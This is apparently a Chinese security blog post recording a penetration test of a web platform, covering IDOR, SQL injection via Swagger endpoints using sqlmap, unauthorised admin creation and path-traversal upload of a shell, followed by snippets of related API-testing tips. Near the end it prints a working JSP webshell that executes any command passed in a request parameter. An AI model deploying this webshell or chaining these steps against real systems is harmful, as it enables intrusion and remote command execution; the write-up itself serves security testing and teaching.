<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    一次簡單的滲透測試記錄

    VSole2022-08-13 07:41:51

    目標

    • 某平臺系統(www.target.net)

    流程

    本次滲透測試的流程圖:

    測試

    拿到站點后先做信息收集,掃描目錄看看有無敏感信息

    寥寥無幾,沒有任何信息,啟動burpsuite打開網站走一遍流程。

    在創建目標處存在圖片上傳接口,上傳shell試試。

    沒有任何過濾,可直接上傳,但當前目錄不解析,猜測projectKey控制上傳路徑

    可跨目錄上傳,但當前/webapp/test/uploadFile/路徑非網站根目錄,爆破了常見網站目錄但沒有一個是正確的解析shell的,先放著后續是否能找到網站根路徑然后再跨目錄上傳。

    越權

    在瀏覽到某個頁面中看到了一處鏈接/detail.shtml?key={{id}},拿出來瀏覽器中訪問,測測是否存在越權或者SQL注入。

    隨便給個數值訪問測試,發現只存在水平越權,不存在注入。

    去掉參數直接訪問,卻彈出來了報錯頁面。

    該站點使用的是spring框架,重新使用spring相關接口路由字典掃一遍,還意外掃到了druid登錄頁面,但并不存在未授權訪問和弱口令的漏洞,繼續看swagger。

    在swagger中找到了一處注入和敏感信息泄露。

    敏感信息泄露

    根據URL猜參數名teamId,查看到所有的團隊信息。

    這里也是一處越權。

    sql注入

    同樣猜參數名,未做任何過濾,單引號報錯,直接上sqlmap一把梭。

    越權添加用戶

    但翻了翻數據庫并未找到管理員賬號密碼,不過找到了網站接口配置信息,將接口導出然后放到burpsuite里面跑

    成功找到了越權添加/編輯用戶接口,直接添加新管理員賬號并登錄。

    任意文件上傳

    回到剛才文件上傳處,通過sql注入報錯頁面我們找到了真實路徑/usr/local/test/webapps/ROOT/WEB-INF/classes/mappings/base-mapper.xml],修改projectKey值,用../../../../跨目錄上傳shell

    疑問

    在最后上傳shell處,嘗試了冰蝎、哥斯拉的馬都無法正常解析,

    (報錯信息為 頁面存在,但無法連接)

    后來更換了帶密碼回顯的jsp馬才成功,后來和朋友溝通后覺得問題是沒有攜帶Cookie,所以導致用冰蝎和哥斯拉無法正常連接。

    <%
        if("admin".equals(request.getParameter("pwd"))){
            java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
            int a = -1;
            byte[] b = new byte[2048];
            out.print("
    ");
            while((a=in.read(b))!=-1){
                out.println(new String(b));
            }
            out.print("
    ");
        }
    
    
    滲透測試接口
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    或是每一個請求有唯一的一個 token,請求提交后,token 失效這樣。把其用戶的瀏覽歷史記錄 url 發送到 intruder,遍歷其用戶的 id,看返回 response 信息中是否有正常返回的,且是其他用戶的,則證明存在接口遍歷問題。
    翻看前端代碼,可憐的js文件就幾個,不過看還真的有了新發現,common.js里面定義了一些地址。擴大戰果有了接口,除了測試接口未授權,我們還能對接口進行其他測試。看了下接口,賬號只能后臺添加、審核、刪除、停用。不了解開發的心態)這里的參數js中并沒有提供,需要自己Fuzz,不過這個系統非常的人性化,提供了報錯信息,圖是后補的。
    滲透測試Tips
    2022-04-13 06:38:50
    知己知彼,百戰不殆1、如果提示缺少參數,如{msg:params error},可嘗使用字典模糊測試構造參數,進一步攻擊。
    接口未授權在嘗是了一波js接口后沒有發現什么漏洞,但是查找到了一些信息泄露。sql注入(兩枚)在剛剛注冊了用戶,登錄進去。第一處將url和參數進行拼接。第二處第二處同樣是js文件內找到。在圖片中間的地方插入xss語句但是如果沒有找到可以注冊的api,則這個漏洞無法利用,為了擴大漏洞危害,嘗試刪除cookie,是否可以未授權文件上傳。
    了解接口常見漏洞,將幫助你在測試接口獲取更多的思路。信息披露信息可能會在 API 響應或公共來源中披露。敏感數據可以包含攻擊者可以利用的任何信息。例如,使用WordPress API的網站可能會在不知不覺中與導航到API路徑的任何人共享用戶信息。錯誤消息可幫助 API 使用者排查其與 API 的交互問題,并允許 API 提供者了解其應用程序的問題。其他良好的信息來源是在偵察期間收集的 API 文檔和資源。
    前言:滲透測試的時候往往會遇到盲注這類的繁雜的手工測試,所以需要編寫半自動化腳本去進行測試減少時間浪費并快速
    滲透測試-API接口測試
    2021-12-28 22:57:33
    一個API中通常包含的結構有:本文記錄的是Postman學習,以及一些接口測試概念。幫助大家建立接口測試的整體概念,以及學會Postman工具的使用。因為客戶自己的測試人員平時做業務功能測試時,也都是有現成的測試 demo的,不可能在Postman中一個一個手動構造請求去測試
    主要是可以拿著這些信息通過goole,或github搜索一些其他的敏感信息,擴大搜索面。效果就不多說了,在github泄漏一些賬號或源碼的事件簡直不要太多。)如果得到的ip結果不同,即可判斷使用了CDN。nmap掃描服務器進行搜集,我認為也是至關重要的一點,不能遺漏。里面的security項rename-command CONFIG ""又問:如果內容禁止使用ip如何探測內網端口1、使用dns解析2、127。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类